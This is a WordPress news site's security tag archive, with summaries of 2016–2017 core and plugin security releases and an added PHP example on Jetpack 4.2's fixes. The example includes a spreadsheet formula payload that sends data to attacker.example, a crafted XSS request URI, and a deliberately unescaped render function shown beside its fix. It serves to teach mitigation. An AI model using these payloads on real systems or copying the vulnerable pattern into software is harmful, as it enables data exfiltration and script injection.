Tag: security

  • Aaron D. Campbell Replaces Nikolay Bachiyski as WordPress’ Security Czar

    Aaron D. Campbell, WordPress Core Contributor at GoDaddy, is replacing Nikolay Bachiyski as WordPress’ Security Czar or WordPress Core Security Team Lead. The role was created in 2015 to provide more structure and focus around incident responses. “The responsibilities of the position include, organizing the security team and making sure all security concerns and reports…

  • WordPress 4.7.1 Fixes Eight Security Issues

    WordPress 4.7.1 is available for download and fixes eight security issues that affect WordPress 4.7 and below. The bundled PHPMailer library was updated to patch a remote code execution (RCE) vulnerability. Wordfence rated the vulnerability critical last month and reported that it affects WordPress core. However, in the announcement post for 4.7.1, Aaron Campbell, WordPress’ new…

  • BuddyPress 2.7.4 Patches Security Vulnerability That Could Allow Arbitrary File Deletion

    The BuddyPress development team has released BuddyPress 2.7.4 to address a security vulnerability that affects all versions back to 2.0. According to John James Jacoby, lead developer of BuddyPress, “This version patches a vulnerability to the BuddyPress core attachments API that could allow arbitrary file deletion on certain installation configurations.” The vulnerability was responsibly disclosed by…

  • WPWeekly Episode 256 – Interview With Tony Perez, CEO and Co-Founder of Sucuri

    In this episode of WordPress Weekly, Marcus Couch and I are joined by Tony Perez, co-founder and CEO of Sucuri. It’s easy to tell from this episode that Perez is extremely passionate about web security. We discussed a wide range of security topics, including trends involving WordPress, the FUD factor, messaging surrounding HTTPS,…

  • WP eCommerce 3.11.4 Patches SQL Injection Vulnerability

    Over the weekend, the WP eCommerce team released version 3.11.4 of its e-commerce plugin. The update patches an SQL injection vulnerability that was responsibly disclosed by Mika Epstein, a member of the WordPress.org plugin review team. According to Justin Sainton, lead developer of WP eCommerce, the team was notified of the vulnerability on November 11th and patched within…

  • High Risk XSS Vulnerability Discovered in W3 Total Cache Plugin

    WP Media is reporting a high risk XSS vulnerability in W3 Total Cache that the company learned about from El Rincón de Zerial’s security blog. The plugin is currently active on more than one million WordPress sites. This particular vulnerability is found within the plugin’s support form that is embedded in the admin, according to…

  • ManageWP Launches Automated Security Scanning

    When ManageWP allowed users to perform security scans of websites through the Orion interface in December of 2015, a feature commonly requested by customers was the ability to automate the scans. Nine months after implementing security checks for customers, ManageWP has added automated security scans to its assortment of features. The automated security scans are a premium feature…

  • WordPress 4.6.1 Released, Patches Two Security Vulnerabilities

    WordPress 4.6.1 is available and users are strongly encouraged to update immediately as it patches two security vulnerabilities. The first is a cross-site scripting vulnerability related to image filenames that was reported by Cengiz Han Sahin, a SumOfPwn researcher. The second is a path traversal vulnerability in the upgrade package uploader reported by Dominik Schilling,…

  • Jetpack 4.2 Released with Performance and Security Updates

    Jetpack 4.2 is a combination release with performance improvements and fixes for a couple of security vulnerabilities. The security updates protect Contact Form submission exports (CSV files that admins open in a spreadsheet) from formula injection and fix a general XSS vulnerability caused by echoing the output of the add_query_arg() function without escaping it. The majority of enhancements in this release are centered on speeding up communication between…
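    The two classes of bug named in the Jetpack 4.2 release notes are common enough in WordPress plugins that they are worth seeing side by side. The PHP below is an added example, not Jetpack’s own code: it models a CSV export that neutralizes spreadsheet formulas (prefixing a single quote is a widely used mitigation, not necessarily the exact change Jetpack shipped), and it models the add_query_arg() XSS pattern. add_query_arg_model() is a stand-in that reproduces only the relevant behaviour of the real WordPress function (it builds on the current request URI and returns the result unescaped); in a real plugin the fix is to wrap the call in esc_url(), for which htmlspecialchars() stands in here so the snippet runs outside WordPress. The sample submissions and the attacker URI are constructed for the example.

```php
<?php
// Added example modelling the two Jetpack 4.2 fix classes; not Jetpack code.

// --- 1. CSV formula injection in form submission exports ------------------
// Spreadsheets treat a cell that starts with = + - or @ as a formula, and some
// skip leading whitespace before deciding. A submission such as
// "=HYPERLINK(...)" executes in the admin's spreadsheet on export. Prefixing
// the value with a single quote forces it to be read as text. (Assumption:
// common mitigation, not necessarily Jetpack's exact patch.)
function neutralize_formula_cell(string $value): string {
    $trimmed = ltrim($value, "\t\r\n ");
    if ($trimmed !== '' && strpos('=+-@', $trimmed[0]) !== false) {
        return "'" . $value;
    }
    return $value;
}

function export_submissions_csv(array $rows): string {
    $fh = fopen('php://temp', 'r+');
    foreach ($rows as $row) {
        fputcsv($fh, array_map('neutralize_formula_cell', $row));
    }
    rewind($fh);
    $csv = stream_get_contents($fh);
    fclose($fh);
    return $csv;
}

// Constructed sample submissions (not real data).
$submissions = [
    ['Alice',   'alice@example.com', 'Thanks for the post'],
    ['Mallory', 'm@example.com',     '=HYPERLINK("http://attacker.example/?x="&A1,"click")'],
    ['Eve',     'e@example.com',     "\t+2+2"],
];
echo export_submissions_csv($submissions);
// Mallory's message is written as '=HYPERLINK(...) and Eve's as '<tab>+2+2,
// both of which a spreadsheet displays as literal text.

// --- 2. add_query_arg() output echoed without escaping --------------------
// Stand-in for WordPress' add_query_arg(): with no URL argument it builds on
// the current request URI and returns the result unescaped. The real function
// re-encodes the query-string part, but the path part is passed through as-is.
function add_query_arg_model(string $key, string $value, string $request_uri): string {
    $sep = (strpos($request_uri, '?') === false) ? '?' : '&';
    return $request_uri . $sep . rawurlencode($key) . '=' . rawurlencode($value);
}

// Vulnerable pattern: the URL goes straight into an HTML attribute.
function render_link_vulnerable(string $request_uri): string {
    return '<a href="' . add_query_arg_model('paged', '2', $request_uri) . '">Next</a>';
}

// Fixed pattern: escape before output. In WordPress use esc_url(); here
// htmlspecialchars() plays that role so the example runs stand-alone.
function render_link_fixed(string $request_uri): string {
    $url = add_query_arg_model('paged', '2', $request_uri);
    return '<a href="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">Next</a>';
}

// Constructed attacker request: the payload sits in the path, which the
// real add_query_arg() does not rewrite, and closes the href attribute.
$evil_uri = '/wp-admin/admin.php/" onmouseover="alert(1)/?page=plugin-settings';
echo render_link_vulnerable($evil_uri), "\n"; // attribute breaks out, handler runs
echo render_link_fixed($evil_uri), "\n";      // quotes become &quot;, stays an href
```

    The single-quote prefix survives a round trip through fputcsv() because the quote is just another character inside the quoted field; exporters that instead strip the leading character change user data and still miss prefixes such as a tab. For the second bug, escaping at output time rather than trying to sanitize REQUEST_URI is the right shape of fix because the same URL may later be used in a redirect or a script context where a different escaper applies.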

  • TechCrunch Hacked by OurMine, Attackers Target Weak Passwords

    TechCrunch is the latest victim in OurMine’s summer hacking rampage. The site, which is powered by WordPress and hosted via WordPress.com VIP, was hacked this morning and defaced with a message from the attackers who identify themselves as an “elite hacker group.” TechCrunch’s news ticker was updated to display: “Hello guys it’s OurMine Team, we…

  • 18 WordPress Plugins Updated Due to Summer of Pwnage Findings, 40+ Vulnerabilities Still in Reporting Stage

    Summer of Pwnage, a Dutch community program for anyone interested in software security, is focusing on WordPress for its current open source security bug hunting event. The community program hosts meetups and workshops on the weekend where anyone from “enthusiastic beginners to the 1337est hackers” is welcome to share findings and demonstrate skills and exploits.…

  • bbPress 2.5.10 Patches Security Vulnerability

    John James Jacoby, lead developer of bbPress, has released bbPress 2.5.10 to patch a security vulnerability in all previous versions of the 2.X branch. This release also contains security hardening improvements where user display names and avatars are commonly displayed together. Jacoby notes that these changes affect bbPress only and don’t impact third-party themes or modifications to the…

  • All in One SEO 2.3.7 Patches Persistent XSS Vulnerability

    Semper Fi Web Design, the company behind All in One SEO, a popular WordPress SEO plugin that’s active on more than one million sites, has released 2.3.7 to patch a persistent XSS security vulnerability. According to the plugin’s changelog, 2.3.7 sanitizes the referer and user agent values handled by the Bad Bots module. While it doesn’t sound significant on the surface, this…

  • WordPress 4.5.3 Fixes 7 Security Issues

    WordPress 4.5.3 was released today to fix seven important security issues that affect 4.5.2 and prior versions. Automatic background updates are already rolling out and all users are advised to update immediately. The release patches the following security issues: a redirect bypass in the customizer (reported by Yassine Aboukir); two different XSS problems via attachment names…